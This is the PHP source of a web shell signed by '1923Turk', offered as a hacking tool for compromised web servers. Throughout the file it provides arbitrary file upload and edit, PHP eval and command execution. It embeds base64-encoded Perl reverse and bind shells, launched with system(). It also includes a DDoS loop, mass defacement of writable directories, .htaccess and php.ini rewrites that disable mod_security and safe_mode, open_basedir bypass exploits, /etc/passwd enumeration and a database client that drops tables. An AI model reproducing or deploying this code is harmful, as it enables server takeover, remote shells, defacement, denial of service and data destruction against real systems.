sada

“;
$formg=”

“;
$nowaddress=’‘;
if (isset($_FILES[“filee”]) and ! $_FILES[“filee”][“error”]) {
if(move_uploaded_file($_FILES[“filee”][“tmp_name”], $_FILES[“filee”][“name”])){
alert(“File Upload Successful”);
}else{
alert(“Permission Denied !”);

}
}
if(ini_get(‘disable_functions’)){
$disablef=ini_get(‘disable_functions’);
}else{
$disablef=”All Functions Enable”;
}
if(ini_get(‘safe_mode’)){
$safe_modes=”On”;
}else{
$safe_modes=”Off”;
}
if ($_REQUEST[‘chmode’] && $_REQUEST[‘chmodenum’]){
if (chmod($_POST[‘chmode’],”0″.$_POST[‘chmodenum’])){alert(“Chmod Ok!”);}else{alert(“Permission Denied !”);}
}
$picdir=’iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAAB30lEQVR42mNggAAuIBZCwjxAzMiAC4jIykrZOLplhcWlzAuLS50PwkFRiTPl1TQDBSQk7OFYRMSejY1NA6iFiUFEUinKwS/mcURW1f9wIA7NrPwflFr63zow7bOJd9IbQ8/EN7qucW+0XOLeyJv5XmETU9RjUDV03BlX2P43oaz/f2hO+3+v5Pr/DlEV/81Div/r+eT+V3PL+C/tlvefP6Lzv6BRyD82ce1IBl07/zNJFf3/Eyon/Q8v7vuf0LPqf3Dt7P9mYWX/1YMr/oslTfrPnzjpv4h92n8Bo7D/rJJ6eQyS5n63PLJa/wcU9f33K+z9H9O7+n/TiRf/7Xp3/Ods3v9fJGnif3H37P/Cjqn/+azj/7PIGrQxsBn7P+V2yfzP45bzn9c9979cZN3/1LUX/ktMvfiftfnQf8Gw+v8C3vn/+Txy/3O7Zv1nVjCZx8DqkPCWw7/0PwgLRtb/d+vf/F+3fPZ/jtDa/0y1O/4zVW76zx5c/R+mhlnFfBsDm3fOZ/bIhv+cMU3/pXIm/xdK7f4P4oMwW0zLf7bEnv/s0c1wMSY953MMQnG1P5UKJ/8nFgvaBz9jYPTJfM2c2PqfWMxoGfCFgUFGK4pBw3wh0VhCuRSUkligaY9YzAIA/X/3S1/5EEMAAAAASUVORK5CYII=’;
$picfile=’iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAABaElEQVR42mMIXfWfef7JT7Yrz34o33ABhj9BaKDYrP3PE6IqpgkyoINNFz9Gnnzw/f/NFz8w8JYrX//P2H6zMrByijCKpl1XPkbee/Xt//fv3zHw/ltf/x+4/vnT7O036wOzkTSuP/cu8sazz/+/fPmCgS8++vx/25XP/xcceP4xr2dLPFA5M1jTytPvIq88/vj/40fc+Oz15//LOxZXAZVzgDUtO/E68tLDD/8/fMCB33/4f/rqs/8lLQur4ZoWH3sdeeH+h//v37/Hjt+9/3/yytP/RU1ImuYefh159u67/2/fvsWK37x58//4pSf/C9A1nb7z9v/r169x4mOXHv/PQ9a0AOi8M3cgJmLDIE0nLj9Bdd6CYy8iz94BKniNBb+B0CdBmpADonP9/cjlBx7/333q8f89p9HwGaA4kF665/7/lGqkIHfwKRax9Yh1t3IICLZ1CApBx1ZAbGIbECwlr28IVM4KAPZgwQxbJyVoAAAAAElFTkSuQmCC’;
$head=’



cihan6776 // 1923Türk Mass-Shell

 

HomeFile ManagerCommand ExecuteBack Connect
BypasS Command eXecute(SF-DF)Symlink
BypasS Directory
Eval Php
Data BaseConvertMail Boomber

Server Information
Dos Local ServerBackup DatabaseMass DefaceDownload Remote FileDDoSFind Writable DirectoryServerRemove MeAbout

Operation System : ‘.php_uname().’ | Php Version : ‘.phpversion().’ | Safe Mode : ‘.$safe_modes.’

‘;
$end=’

Coded By ; 1923Turk // cihan6776

‘;
$deny=$head.”

Oh My God!
Permission Denied”.$end;
function alert($text){
echo ““;
}
if ($_GET[‘do’]==”edit” && $_GET[‘filename’]!=”dir”){
if(is_readable($_GET[‘address’].$_GET[‘filename’])){
$opedit=fopen($_GET[‘address’].$_GET[‘filename’],”r”);
while(!feof($opedit))
$data.=fread($opedit,9999);
fclose($opedit);
echo $head.$formp.$nowaddress.’

File Name : ‘.$_GET[‘address’].$_GET[‘filename’].’


‘.$end;exit;
}else{alert(“Permission Denied !”);}}
function sizee($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . ” GB”;}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . ” MB”;}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . ” KB”;}
else {$size = $size . ” B”;}
return $size;
}
if($_REQUEST[‘do’]==’about’){
echo $head.”

1923Turk // cihan6776
V1
Last Update : 2010/10/10

www.1923turk.com


“.$end;exit;

}
function deleteDirectory($dir) {
if (!file_exists($dir)) return true;
if (!is_dir($dir) || is_link($dir)) return unlink($dir);
foreach (scandir($dir) as $item) {
if ($item == ‘.’ || $item == ‘..’) continue;
if (!deleteDirectory($dir . “/” . $item)) {
chmod($dir . “/” . $item, 0777);
if (!deleteDirectory($dir . “/” . $item)) return false;
};}return rmdir($dir);}

function download($fileadd,$finame){
$dlfilea=$fileadd.$finame;
header(“Content-Disposition: attachment; filename=” . $finame);
header(“Content-Type: application/download”);
header(“Content-Length: ” . filesize($dlfilea));
flush();
$fp = fopen($$dlfilea, “r”);
while (!feof($fp))
{
echo fread($fp, 65536);
flush();
}
fclose($fp);
}
if($_GET[‘do’]==”rename”){
echo $head.$formp.$nowaddress.’

To

‘.$end;exit;
}

if ($_GET[‘byapache’]==’ofms’){
$fse=fopen(getcwd().$slash.”.htaccess”,”w”);
fwrite($fse,’
Sec——Engine Off
Sec——ScanPOST Off
‘);
fclose($fse);
}elseif ($_GET[‘byapache’]==’bysap’){
$fse=fopen(getcwd().$slash.”.htaccess”,”w”);
fwrite($fse,’Options +FollowSymLinks
DirectoryIndex Persian-Gulf-For-Ever.html’);
fclose($fse);
}elseif ($_GET[‘byapache’]==’sfadf’){
$fse=fopen(getcwd().$slash.”php.ini”,”w”);
fwrite($fse,’safe_mode=OFF
disable_functions=NONE’);
fclose($fse);
}
if($_GET[‘do’]==”apache”){
echo $head.$formg.$nowaddress.’


‘.$end;exit;
}
if($_GET[‘do’]==”dd0s”){
echo $head.$formg.$nowaddress.’

Address : Time :

‘.$end;exit;
}

if($_GET[‘urldd0’] && $_GET[‘timedd0’]){
for ($id=0;$$id<$_GET['timedd0'];$id++){ $fp=null; $contents=null; $fp=fopen($_GET['urldd0'],"rb"); while (!feof($fp)) { $contents .= fread($fp, 8192); } fclose($fp); }} if($_GET['do']=="dlfile"){ echo $head.$formp.$nowaddress.'

Download Remote File!
Address :
Save To :

‘.$end;exit;
}
function dirpe($addres){
global $slash;
$idd=0;
if ($dirhen = @opendir($addres)) {
while ($file = readdir($dirhen)) {
$permdir=str_replace(‘//’,’/’,$addres.$slash.$file);
if($file!=’.’ && $file!=’..’ && is_dir($permdir)){
if (is_writable($permdir)) {
$dirdata[$idd][‘filename’]=$permdir;
$idd++;
}
dirpe($permdir);
}
}
closedir($dirhen);
} else {
return (“notperm”);
}
if ($dirdata){
return $dirdata;
}else{
return “notfound”;

}
}
function dirpmass($addres,$massname,$masssource){
global $slash;
$idd=0;
if ($dirhen = @opendir($addres)) {
while ($file = readdir($dirhen)) {
$permdir=str_replace(‘//’,’/’,$addres.$slash.$file);
if($file!=’.’ && $file!=’..’ && is_dir($permdir)){
if (is_writable($permdir)) {
if ($fm=fopen($permdir.$slash.$massname,”w”)){
fwrite($fm,$masssource);
fclose($fm);
$dirdata[$idd][‘filename’]=$permdir;
}

$idd++;
}
dirpmass($permdir);
}
}
closedir($dirhen);
} else {
return (“notperm”);
}
if ($dirdata){
return $dirdata;
}else{
return “notfound”;

}
}
if($_GET[‘do’]==”perm”){
echo $head.$formp.’

Find All Folder Writeable

‘.$end;exit;
}
if ($_POST[‘affw’]){
$arrfilelist=dirpe($_POST[‘affw’]);
if ($arrfilelist==’notfound’){
alert(“Not Found !”);
}elseif($arrfilelist==’notperm’){
alert(“Permission Denied !”);
}else{
foreach ($arrfilelist as $tmpdir){
if ($coi %2){
$colort='”#e7e3de”‘;
}else{
$colort='”#e4e1de”‘;}
$coi++;
$permdir=$permdir.’

‘.$tmpdir[‘filename’].’

‘;
}
echo $head.’

Now Directory : ‘.getcwd().”
“.printdrive().’
Back

‘.$permdir.’

‘.$end;exit;
}}
if($_GET[‘do’]==”mass”){
echo $head.$formp.’

[Mass Deface]


‘.$end;exit;
}
if ($_POST[‘mffw’]){
$arrfilelist=dirpmass($_POST[‘mffw’],$_POST[‘massname’],$_POST[‘masssource’]);
if ($arrfilelist==’notfound’){
alert(“Not Found !”);
}elseif($arrfilelist==’notperm’){
alert(“Permission Denied !”);
}else{
foreach ($arrfilelist as $tmpdir){
if ($coi %2){
$colort='”#e7e3de”‘;
}else{
$colort='”#e4e1de”‘;}
$coi++;
$permdir=$permdir.’


‘.$formg.’Change Directory
Upload —>  
‘.$nowaddress.’


‘.$ifupload.’
‘.$formp.’Chmod —->  File :

  Permission :
‘.$formp.’Create Dir —-> Dirctory Name
‘.$nowaddress.’
‘.$formp.’Create File —-> Name File ‘.$nowaddress.’
‘.$formp.’Copy —->  File :
To Directory

‘.$tmpdir[‘filename’].’

‘;
}
echo $head.’

Now Directory : ‘.getcwd().”
“.printdrive().’
Back

‘.$permdir.’

‘.$end;exit;
}}
if($_POST[‘adlr’] && $_POST[‘adsr’]){
$url = $_POST[‘adlr’];
$newfname = $_POST[‘adsr’] . basename($url);
$file = fopen ($url, “rb”);
if ($file) {
$newf = fopen ($newfname, “wb”);
if ($newf)
while(!feof($file)) {
fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
}
alert(“File Downloaded Success”);
}else{alert(“Can Not Open File”);}
if ($file) {
fclose($file);
}
if ($newf) {
fclose($newf);
}
}
if($_GET[‘do’]==”down” and $_GET[‘type’]==’file’){
download($_GET[‘address’],$_GET[‘filename’]);}
if($_GET[‘do’]==”down” and $_GET[‘type’]==’dir’){
class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = “x50x4bx05x06x00x00x00x00”;
var $old_offset = 0;
function add_dir($name)
{
$name = str_replace(“\”, “/”, $name);
$fr = “x50x4bx03x04”;
$fr .= “x0ax00”;
$fr .= “x00x00”;
$fr .= “x00x00”;
$fr .= “x00x00x00x00”;
$fr .= pack(“V”,0);
$fr .= pack(“V”,0);
$fr .= pack(“V”,0);
$fr .= pack(“v”, strlen($name) );
$fr .= pack(“v”, 0 );
$fr .= $name;
$fr .= pack(“V”,$crc);
$fr .= pack(“V”,$c_len);
$fr .= pack(“V”,$unc_len);
$this -> datasec[] = $fr;
$new_offset = strlen(implode(“”, $this->datasec));
$cdrec = “x50x4bx01x02″;
$cdrec .=”x00x00″;
$cdrec .=”x0ax00″;
$cdrec .=”x00x00″;
$cdrec .=”x00x00″;
$cdrec .=”x00x00x00x00”;
$cdrec .= pack(“V”,0);
$cdrec .= pack(“V”,0);
$cdrec .= pack(“V”,0);
$cdrec .= pack(“v”, strlen($name) );
$cdrec .= pack(“v”, 0 );
$cdrec .= pack(“v”, 0 );
$cdrec .= pack(“v”, 0 );
$cdrec .= pack(“v”, 0 );
$ext = “x00x00x10x00”;
$ext = “xffxffxffxff”;
$cdrec .= pack(“V”, 16 );
$cdrec .= pack(“V”, $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function add_file($data, $name)
{
$name = str_replace(“\”, “/”, $name);
$fr = “x50x4bx03x04”;
$fr .= “x14x00”;
$fr .= “x00x00”;
$fr .= “x08x00”;
$fr .= “x00x00x00x00”;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr( substr($zdata, 0, strlen($zdata) – 4), 2);
$c_len = strlen($zdata);
$fr .= pack(“V”,$crc);
$fr .= pack(“V”,$c_len);
$fr .= pack(“V”,$unc_len);
$fr .= pack(“v”, strlen($name) );
$fr .= pack(“v”, 0 );
$fr .= $name;
$fr .= $zdata;
$fr .= pack(“V”,$crc);
$fr .= pack(“V”,$c_len);
$fr .= pack(“V”,$unc_len);
$this -> datasec[] = $fr;
$new_offset = strlen(implode(“”, $this->datasec));
$cdrec = “x50x4bx01x02″;
$cdrec .=”x00x00″;
$cdrec .=”x14x00″;
$cdrec .=”x00x00″;
$cdrec .=”x08x00″;
$cdrec .=”x00x00x00x00”;
$cdrec .= pack(“V”,$crc);
$cdrec .= pack(“V”,$c_len);
$cdrec .= pack(“V”,$unc_len);
$cdrec .= pack(“v”, strlen($name) );
$cdrec .= pack(“v”, 0 );
$cdrec .= pack(“v”, 0 );
$cdrec .= pack(“v”, 0 );
$cdrec .= pack(“v”, 0 );
$cdrec .= pack(“V”, 32 );
$cdrec .= pack(“V”, $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file() {
$data = implode(“”, $this -> datasec);
$ctrldir = implode(“”, $this -> ctrl_dir);
return
$data.
$ctrldir.
$this -> eof_ctrl_dir.
pack(“v”, sizeof($this -> ctrl_dir)).
pack(“v”, sizeof($this -> ctrl_dir)).
pack(“V”, strlen($ctrldir)).
pack(“V”, strlen($data)).
“x00x00”;
}
}
$dlfolder=$_GET[‘address’].$slash.$_GET[‘dirname’].$slash;
$zipfile = new zipfile();
function get_files_from_folder($directory, $put_into) {
global $zipfile;
if ($handle = opendir($directory)) {
while (false !== ($file = readdir($handle))) {
if (is_file($directory.$file)) {
$fileContents = file_get_contents($directory.$file);
$zipfile->add_file($fileContents, $put_into.$file);
} elseif ($file != ‘.’ and $file != ‘..’ and is_dir($directory.$file)) {
$zipfile->add_dir($put_into.$file.’/’);
get_files_from_folder($directory.$file.’/’, $put_into.$file.’/’);
}
}
}
closedir($handle);
}
$datedl=date(“y-m-d”);
get_files_from_folder($dlfolder,”);
header(“Content-Disposition: attachment; filename=” . $_GET[‘dirname’].”-“.$datedl.”.zip”);
header(“Content-Type: application/download”);
header(“Content-Length: ” . strlen($zipfile -> file()));
flush();
echo $zipfile -> file();
$filename = $_GET[‘dirname’].”-“.$datedl.”.zip”;
$fd = fopen ($filename, “wb”);
$out = fwrite ($fd, $zipfile -> file());
fclose ($fd);
}
if ($_REQUEST[‘cdirname’]){
if(mkdir($_REQUEST[‘cdirname’],”0777″)){alert(“Directory Created !”);}else{alert(“Permission Denied !”);}}
function bcn($ipbc,$pbc){
$bcperl=”IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb
MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw
dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n
IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo
YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN
LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0
KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll
KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog
IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4
ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==”;
$opbc=fopen(“bcc.pl”,”w”);
fwrite($opbc,base64_decode($bcperl));
fclose($opbc);
system(“perl bcc.pl $ipbc $pbc”) or die(“I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode”);
}
function wbp($wb){
$wbp=”dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj
cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j
a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu
ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs
IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl
IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO
VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT
VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g”;
$opwb=fopen(“wbp.pl”,”w”);
fwrite($opwb,base64_decode($wbp));
fclose($opwb);
echo getcwd();
system(“perl wbp.pl $wb”) or die(“I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode”);
}
function lbp($wb){
$lbp=”IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv
YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg
U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF
VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO
QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw
dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7
b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o
Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g”;
$oplb=fopen(“lbp.pl”,”w”);
fwrite($oplb,base64_decode($lbp));
fclose($oplb);
system(“perl lbp.pl $wb”) or die(“I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode”);
}

if($_REQUEST[‘portbw’]){
wbp($_REQUEST[‘portbw’]);

}if($_REQUEST[‘portbl’]){
lbp($_REQUEST[‘portbl’]);
}
if($_REQUEST[‘ipcb’] && $_REQUEST[‘portbc’]){
bcn($_REQUEST[‘ipcb’],$_REQUEST[‘portbc’]);

}

if($_REQUEST[‘do’]==”bc”){
echo $head.$formp.”

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< Back Connect >>>>>>
Ip Address : Port :

“.$formp.”

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< Windows Bind Port >>>>>>
Port :

“.$formp.”

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< Linux Bind Port >>>>>>
Port :

“.$end;exit;

}
function copyf($file1,$file2,$filename){
global $slash;
$fpc = fopen($file1, “rb”);
$source = ”;
while (!feof($fpc)) {
$source .= fread($fpc, 8192);
}
fclose($fpc);
$opt = fopen($file2.$slash.$filename, “w”);
fwrite($opt, $source);
fclose($opt);
}
if ($_REQUEST[‘copyname’] && $_REQUEST[‘cpyto’]){
if(is_writable($_REQUEST[‘cpyto’])){
echo $_REQUEST[‘address’];
copyf($_REQUEST[‘address’].$slash.$_REQUEST[‘copyname’],$_REQUEST[‘cpyto’],$_REQUEST[‘copyname’]);
}else{alert(“Permission Denied !”);}}
if($_REQUEST[‘cfilename’]){

echo $head.$formp.$nowaddress.’

Create File


‘.$end;exit;
}

if($_REQUEST[‘nf4c’] && $_REQUEST[‘nf4cs’]){
if($ofile4c=fopen($_REQUEST[‘nf4c’],”w”)){
fwrite($ofile4c,$_REQUEST[‘nf4cs’]);
fclose($ofile4c);
alert(“File Saved !”);}else{alert(“Permission Denied !”);}}

function sqlclienT(){
global $t,$errorbox,$et,$hcwd;
if(!empty($_REQUEST[‘serveR’]) && !empty($_REQUEST[‘useR’]) && isset($_REQUEST[‘pasS’]) && !empty($_REQUEST[‘querY’])){
$server=$_REQUEST[‘serveR’];$type=$_REQUEST[‘typE’];$pass=$_REQUEST[‘pasS’];$user=$_REQUEST[‘useR’];$query=$_REQUEST[‘querY’];
$db=(empty($_REQUEST[‘dB’]))?”:$_REQUEST[‘dB’];
$_SESSION[server]=$_REQUEST[‘serveR’];$_SESSION[type]=$_REQUEST[‘typE’];$_SESSION[pass]=$_REQUEST[‘pasS’];$_SESSION[user]=$_REQUEST[‘useR’];

}

if (isset ($_GET[select_db])){
$getdb=$_GET[select_db];
$_SESSION[db]=$getdb;
$query=”SHOW TABLES”;
$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
}
elseif (isset ($_GET[select_tbl])){
$tbl=$_GET[select_tbl];
$_SESSION[tbl]=$tbl;
$query=”SELECT * FROM `$tbl`”;
$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
}
elseif (isset ($_GET[drop_db])){
$getdb=$_GET[drop_db];
$_SESSION[db]=$getdb;
$query=”DROP DATABASE `$getdb`”;
querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],”,$query);
$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],”,’SHOW DATABASES’);
}
elseif (isset ($_GET[drop_tbl])){
$getbl=$_GET[drop_tbl];
$query=”DROP TABLE `$getbl`”;
querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],’SHOW TABLES’);
}
elseif (isset ($_GET[drop_row])){
$getrow=$_GET[drop_row];
$getclm=$_GET[clm];
$query=”DELETE FROM `$_SESSION[tbl]` WHERE $getclm=’$getrow'”;
$tbl=$_SESSION[tbl];
querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],”SELECT * FROM `$tbl`”);
}
else
$res=querY($type,$server,$user,$pass,$db,$query);

if($res){
$res=htmlspecialchars($res);
$row=array ();
$title=explode(‘[+][+][+]’,$res);
$trow=explode(‘[-][-][-]’,$title[1]);
$row=explode(‘|+|+|+|+|+|’,$title[0]);
$data=array();
$field=$trow[count($trow)-2];
if (strstr($trow[0],’Database’)!=”)
$obj=’db’;
elseif (substr($trow[0],0,6)==’Tables’)
$obj=’tbl’;
else
$obj=’row’;
$i=0;
foreach ($row as $a){
if($a!=”)
$data[$i++]=explode(‘|-|-|-|-|-|’,$a);
}

echo “


‘.$formg.’Change Directory
Upload —>  
‘.$nowaddress.’


‘.$ifupload.’
‘.$formp.’Chmod —->  File :

  Permission :
‘.$formp.’Create Dir —-> Dirctory Name
‘.$nowaddress.’
‘.$formp.’Create File —-> Name File ‘.$nowaddress.’
‘.$formp.’Copy —->  File :
To Directory
“;
foreach ($trow as $ti)
echo “

“;
echo “

“;
$j=0;
while ($data[$j]){
echo “

“;
foreach ($data[$j++] as $dr){
echo “

“;
}
echo “

“;
}
echo “

$ti
“;
if($obj!=’row’) echo ““;
echo $dr;
if($obj!=’row’) echo “
“;
echo “
Drop

“;

}

if(empty($_REQUEST[‘typE’]))$_REQUEST[‘typE’]=”;
echo “

Connect to Database

DB Type:
Server Address:
Username:
Password:

Submit a Query

DB Name:
Query:
$hcwd

$et

“;
}

function querY($type,$host,$user,$pass,$db=”,$query){
$res=”;
switch($type){
case ‘MySQL’:
if(!function_exists(‘mysql_connect’))return 0;
$link=mysql_connect($host,$user,$pass);
if($link){
if(!empty($db))mysql_select_db($db,$link);
$result=mysql_query($query,$link);
if ($result!=1){
while($data=mysql_fetch_row($result))$res.=implode(‘|-|-|-|-|-|’,$data).’|+|+|+|+|+|’;
$res.='[+][+][+]’;
for($i=0;$i
‘;

curl_close($ch);
}
if ($_REQUEST[‘bypcu’]){
bypcu($_REQUEST[‘bypcu’]);
}
if($_REQUEST[‘do’]==”bypasscmd”){
if($_POST[‘bycw’]){
echo $_POST[‘bycw’];
$wsh = new COM(‘W’.’Scr’.’ip’.’t.she’.’ll’);
$exec = $wsh->exec (“cm”.”d.e”.”xe /c “.$_POST[‘bycw’].””);
$stdout = $exec->StdOut();
$stcom = $stdout->ReadAll();}

echo $head.’


Bypass Safe_Mode And Disable_Functions In Windows Server

‘.$formp.’Command

Bypass Safe_Mode Windows Server

‘.$formp.’Command

‘.$end;exit;;
}
if($_REQUEST[‘do’]==”bypassdir”){
if($_POST[‘byoc’]){
if(copy(“compress.zlib://”.$_POST[‘byoc’], getcwd().”/”.”peji.txt”)){
$bopens=”Bypass Succesfull Plz Read File Peji.txt In This Folder”;
}else{$bopens=”Can Not Bypass This”;}
}
if($_POST[‘byfc’]){
curl_init(“file:///”.$_POST[‘byfc’].”x00/../../../../../../../../../../../../”.__FILE__);
$debfc=curl_exec($ch);
}
if($_POST[‘byetc’]){
for($bye=0;$bye<40000;$bye++){ $sbep =$sbep. posix_getpwuid($bye); }} if($_POST['byfc9']){ echo "not sucsfull"; } if($_REQUEST['bysyml']){ $file=$_REQUEST['bysyml']; bywsym($file); } echo $head.'


Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2

‘.$formp.’Address File

Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4

‘.$formp.’Address File

Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X … 5.2.9

‘.$formp.’Address File

Bypass /Etc/Passwd
‘.$formp.’
Bypass With ini_restore’.$formp.’
Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink

‘.$formp.’

‘.$formp.’Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x … 5.2.9

‘.$formp.’

‘.$end;exit;;

}
function printdrive(){
global $slash;
foreach (range(“A”,”Z”) as $tempdrive) {
if (is_dir($tempdrive.”:”.$slash)){
$adri=$tempdrive.”:”.$slash;
$drivea=$drivea.’‘.$tempdrive.’:’.$slash.’ ‘;
}
}
return $drivea;
}
if($_POST[‘nameren’] && $_POST[‘addressren’]){
if(is_writable($_REQUEST[‘addressren’])){

rename($_POST[‘addressren’],$_POST[‘nameren’]);alert(“Rename Successful !”);
}else{alert(“Permission Denied !”);}
}
if($_GET[‘do’]==”delete”){

if ($_GET[‘type’]==”dir”){
if(is_writable($_REQUEST[‘address’])){
$dir=$_GET[‘address’].$_GET[‘filename’];
deleteDirectory($dir);
alert(“Deleted Successful !”);
}else{alert(“Permission Denied !”);}
}elseif($_GET[‘type’]==”file”){
if(is_writable($_GET[‘address’].$_GET[‘filename’])){
unlink($_GET[‘address’].$_GET[‘filename’]);alert(“Deleted Successful !”);
}else{alert(“Permission Denied !”);}
}
}
if($_POST[‘fedit’] && $_POST[‘namefe’]){
if(is_writable($_REQUEST[‘address’])){

$opensave=fopen($_POST[‘address’].$slash.$_POST[‘namefe’],”w”);
fwrite($opensave,html_entity_decode($_POST[‘fedit’]));
fclose($opensave);alert(“File Saved Successful !”);
}else{alert(“Permission Denied !”);}
}
if ($_POST[‘evalsource’]){

eval($_POST[‘evalsource’]);
}
if($_GET[‘do’]==”eval”){
echo $head.$formp.$nowaddress.’


‘.$end;exit;
}
if($_GET[‘do’]==”info”){

if(ini_get(‘register_globals’)){
$registerg=”Enable”;
}else{
$registerg=”disable”;
}
if(extension_loaded(‘curl’)){
$curls=”Enable”;
}else{
$curls=”disable”;
}
if(@function_exists(‘mysql_connect’)){
$db_on = “Mysql : On”;
};
if(@function_exists(‘mssql_connect’)){
$db_on = “Mssql : On”;
};
if(@function_exists(‘pg_connect’)){
$db_on = “PostgreSQL : On”;
};if(@function_exists(‘ocilogon’)){
$db_on = “Oracle : On”;
};

echo $head.”Operating System : “.php_uname().”
Server Name : “.$_SERVER[‘HTTP_HOST’].”
Disable_Functions : “.$disablef.”
Safe_Mode : “.$safe_modes.”
Openbase_dir : “.ini_get(‘openbase_dir’).”
Php Version : “.phpversion().”
Free Space : “.sizee(disk_free_space(“/”)).”
Total Space : “.sizee(disk_total_space(“/”)).”
Register_Globals : “.$registerg.”
Curl : “.$curls.”
Database “.$db_on.”
Server Name : “.$_SERVER[‘HTTP_HOST’].”
Admin Server : “.$_SERVER[‘SERVER_ADMIN’].$end;
exit;
}
if ($_GET[‘do’]==”cmd”){
echo $head.’

‘.$end;exit;}
if ($_GET[‘do’]==”symlink”){
echo $head.’

SymLink With PHP
TO


SymLink With OS :
TO

‘.$end;exit;}
if ($_POST[‘ad1syp’] && $_POST[‘ad2syp’]){
if (symlink($_POST[‘ad1syp’],$_POST[‘ad2syp’])){
alert(“Symlink Worked !”);
}else{
alert(“Symlink Not Worked !”);
}}
